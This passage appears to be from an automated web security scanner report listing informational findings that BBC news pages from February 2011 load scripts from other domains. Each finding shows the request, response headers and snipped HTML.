<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.26. http://www.bbc.co.uk/news/uk-northern-ireland-12428837

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12428837

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-northern-ireland-12428837 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:58 GMT
Keep-Alive: timeout=10, max=783
Expires: Sat, 12 Feb 2011 02:02:58 GMT
Connection: close
Set-Cookie: BBC-UID=b49df5856e3a05f2ba62ea37a13ba43da569a2e720d031491b6b33de68ad635a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b49df5856e3a05f2ba62ea37a13ba43da569a2e720d031491b6b33de68ad635a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.27. http://www.bbc.co.uk/news/uk-politics-12428814

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-politics-12428814

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-politics-12428814 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:58 GMT
Keep-Alive: timeout=10, max=679
Expires: Sat, 12 Feb 2011 02:02:58 GMT
Connection: close
Set-Cookie: BBC-UID=b46d05a56e7ae522aeef0d1e81ff1e95e05a8d8f4010c12ae42bcac561612a4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b46d05a56e7ae522aeef0d1e81ff1e95e05a8d8f4010c12ae42bcac561612a4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.3//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.28. http://www.bbc.co.uk/news/uk-scotland-12433015

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-12433015

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-scotland-12433015 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:59 GMT
Keep-Alive: timeout=10, max=758
Expires: Sat, 12 Feb 2011 02:02:59 GMT
Connection: close
Set-Cookie: BBC-UID=34ed35558eeae523bab13453a119e5ec2335e6be50b041494bcb73b217dd395e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34ed35558eeae523bab13453a119e5ec2335e6be50b041494bcb73b217dd395e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.29. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-tayside-central-12433192

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-scotland-tayside-central-12433192 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:00 GMT
Keep-Alive: timeout=10, max=723
Expires: Sat, 12 Feb 2011 02:03:00 GMT
Connection: close
Set-Cookie: BBC-UID=14ada5e54eeac5b49bf80e8501b7169dea5a5de76030d18a743beab5fb116c9a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:00 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=14ada5e54eeac5b49bf80e8501b7169dea5a5de76030d18a743beab5fb116c9a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:00 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.30. http://www.bbc.co.uk/news/uk-wales-12427865

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12427865

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-wales-12427865 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=731
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=246d55856e4aa5658bca24e421d0a77239544b3050f0515a243bcac4c08c26220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=246d55856e4aa5658bca24e421d0a77239544b3050f0515a243bcac4c08c26220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.31. http://www.bbc.co.uk/news/uk-wales-12433322

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12433322

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-wales-12433322 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=660
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=a49d8585aeea05757e2fffb1510341d93146ef955010519a744baae5d1416aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a49d8585aeea05757e2fffb1510341d93146ef955010519a744baae5d1416aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.3//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.32. http://www.bbc.co.uk/news/world-12428938

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12428938

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-12428938 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:02 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:02 GMT
Connection: close
Set-Cookie: BBC-UID=84fd55c5be8a45861a36943741935ca2439c915400b0315a845b9ac5adf066540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:02 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84fd55c5be8a45861a36943741935ca2439c915400b0315a845b9ac5adf066540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:02 GMT; path=/; domain=bbc.co.uk;
Content-Length: 48497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.33. http://www.bbc.co.uk/news/world-12434787

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12434787

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-12434787 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=24ed25d55e2ad5acca13b58c817fe390a92b4a8bb0d051baf4cbeaf6172427f80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24ed25d55e2ad5acca13b58c817fe390a92b4a8bb0d051baf4cbeaf6172427f80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.34. http://www.bbc.co.uk/news/world-africa-12427390

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12427390

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-africa-12427390 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:12 GMT
Keep-Alive: timeout=10, max=769
Expires: Sat, 12 Feb 2011 02:03:12 GMT
Connection: close
Set-Cookie: BBC-UID=448d5515aeaa16607b199c37f1baf5fde8cc790860a0c15a34cbaa84bcee08ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448d5515aeaa16607b199c37f1baf5fde8cc790860a0c15a34cbaa84bcee08ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.35. http://www.bbc.co.uk/news/world-africa-12430115

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12430115

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-africa-12430115 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:13 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:03:13 GMT
Connection: close
Set-Cookie: BBC-UID=64bde5855e8ae6517afa052d01ec189ea6deab7710e061190b6b73de1e4bccce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64bde5855e8ae6517afa052d01ec189ea6deab7710e061190b6b73de1e4bccce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Content-Length: 71002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
